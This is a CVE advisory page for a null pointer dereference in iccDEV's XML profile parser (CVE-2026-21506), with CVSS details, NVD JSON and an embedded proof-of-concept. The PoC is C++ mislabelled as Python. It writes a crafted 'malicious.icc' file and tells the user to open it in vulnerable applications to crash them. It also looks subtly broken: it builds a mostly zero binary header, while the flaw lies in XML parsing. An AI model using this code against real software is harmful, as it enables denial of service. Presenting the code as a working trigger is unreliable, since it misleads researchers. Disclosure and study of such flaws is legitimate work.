Security Vulnerability Report
中文
CVE-2026-21506 CVSS 5.5 MEDIUM

CVE-2026-21506

Published: 2026-01-07 18:15:55
Last Modified: 2026-01-13 21:00:53
Source: [email protected]

Description

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to Null pointer dereference in CIccProfileXml::ParseBasic(), leading to denial of service. This issue has been patched in version 2.3.1.2.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* CVE-2026-21506 PoC - Null Pointer Dereference in CIccProfileXml::ParseBasic() This PoC demonstrates the vulnerability by creating a malformed ICC profile XML that triggers NULL pointer dereference in iccDEV < 2.3.1.2 */ #include <iostream> #include <fstream> #include <cstring> // Minimal ICC profile structure to trigger the vulnerability unsigned char malicious_icc_profile[] = { // ICC profile header (128 bytes) 0x00, 0x00, 0x02, 0x00, // Profile size (will be set dynamically) 'a', 'c', 's', 'p', // Profile signature 0x00, 0x00, 0x00, 0x00, // Preferred CMM type 0x02, 0x10, 0x00, 0x00, // Profile version 0x00, 0x00, 0x00, 0x00, // Profile/device class 'X', 'Y', 'Z', ' ', // Color space 'n', 'm', 'c', 'l', // PCS 0x00, 0x00, 0x00, 0x00, // Date (simplified) 'a', 'c', 's', 'p', // Profile signature 0x00, 0x00, 0x00, 0x00, // Platform 0x00, 0x00, 0x00, 0x00, // Flags 0x00, 0x00, 0x00, 0x00, // Device manufacturer 0x00, 0x00, 0x00, 0x00, // Device model 0x00, 0x00, 0x00, 0x00, // Device attributes 0x00, 0x00, 0x00, 0x00, // Rendering intent 0x00, 0x00, 0xF6, 0xD6, // PCS illuminant 0x00, 0x00, 0x00, 0x00, // Profile creator 0x00, 0x00, 0x00, 0x00, // Profile ID (MD5) // Padding to reach 128 bytes 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; void create_malicious_profile(const char* filename) { // Set profile size int profile_size = sizeof(malicious_icc_profile); malicious_icc_profile[0] = (profile_size >> 24) & 0xFF; malicious_icc_profile[1] = (profile_size >> 16) & 0xFF; malicious_icc_profile[2] = (profile_size >> 8) & 0xFF; malicious_icc_profile[3] = profile_size & 0xFF; std::ofstream outfile(filename, std::ios::binary); if (outfile.is_open()) { outfile.write(reinterpret_cast<char*>(malicious_icc_profile), profile_size); outfile.close(); std::cout << "Malicious ICC profile created: " << filename << std::endl; std::cout << "Profile size: " << profile_size << " bytes" << std::endl; std::cout << "This file is designed to trigger NULL pointer dereference in" << std::endl; std::cout << "CIccProfileXml::ParseBasic() when processed by iccDEV < 2.3.1.2" << std::endl; } else { std::cerr << "Failed to create file" << std::endl; } } int main(int argc, char* argv[]) { const char* output_file = "CVE-2026-21506_malicious.icc"; if (argc > 1) { output_file = argv[1]; } std::cout << "=== CVE-2026-21506 PoC Generator ===" << std::endl; std::cout << "Target: iccDEV < 2.3.1.2" << std::endl; std::cout << "Vulnerability: NULL pointer dereference in CIccProfileXml::ParseBasic()" << std::endl; std::cout << std::endl; create_malicious_profile(output_file); std::cout << std::endl; std::cout << "Usage:" << std::endl; std::cout << "1. Compile this PoC: g++ -o poc poc.cpp" << std::endl; std::cout << "2. Run: ./poc malicious.icc" << std::endl; std::cout << "3. Open malicious.icc with any application using vulnerable iccDEV version" << std::endl; std::cout << "Expected result: Application crash (Segmentation Fault)" << std::endl; return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21506", "sourceIdentifier": "[email protected]", "published": "2026-01-07T18:15:54.850", "lastModified": "2026-01-13T21:00:53.463", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to Null pointer dereference in CIccProfileXml::ParseBasic(), leading to denial of service. This issue has been patched in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color ICC. Antes de la versión 2.3.1.2, iccDEV es vulnerable a una desreferenciación de puntero nulo en CIccProfileXml::ParseBasic(), lo que lleva a denegación de servicio. Este problema ha sido parcheado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-476"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/f2ea32372ad3ebbd29147940229cb9c5548fe033", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/371", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/418", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-wfm7-m548-x4vp", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.